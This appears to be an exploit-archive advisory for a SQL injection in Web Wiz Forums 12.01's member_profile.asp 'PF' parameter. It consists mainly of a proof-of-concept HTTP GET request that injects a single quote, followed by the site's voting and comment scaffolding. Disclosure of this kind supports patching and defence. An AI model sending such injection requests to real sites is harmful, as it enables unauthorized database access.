Web Wiz Forums 12.01 PF SQL Injection

2019.08.17
Credit: n1x_
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection # Date: 2019-09-16 # Exploit Author: n1x_ [MS-WEB] # Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm # Version: 12.01 # Tested on Windows # Vulnerable parameter: PF (member_profile.asp) # GET Request GET /member_profile.asp?PF=10' HTTP/1.1 Host: host User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD Connection: close Upgrade-Insecure-Requests: 1


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top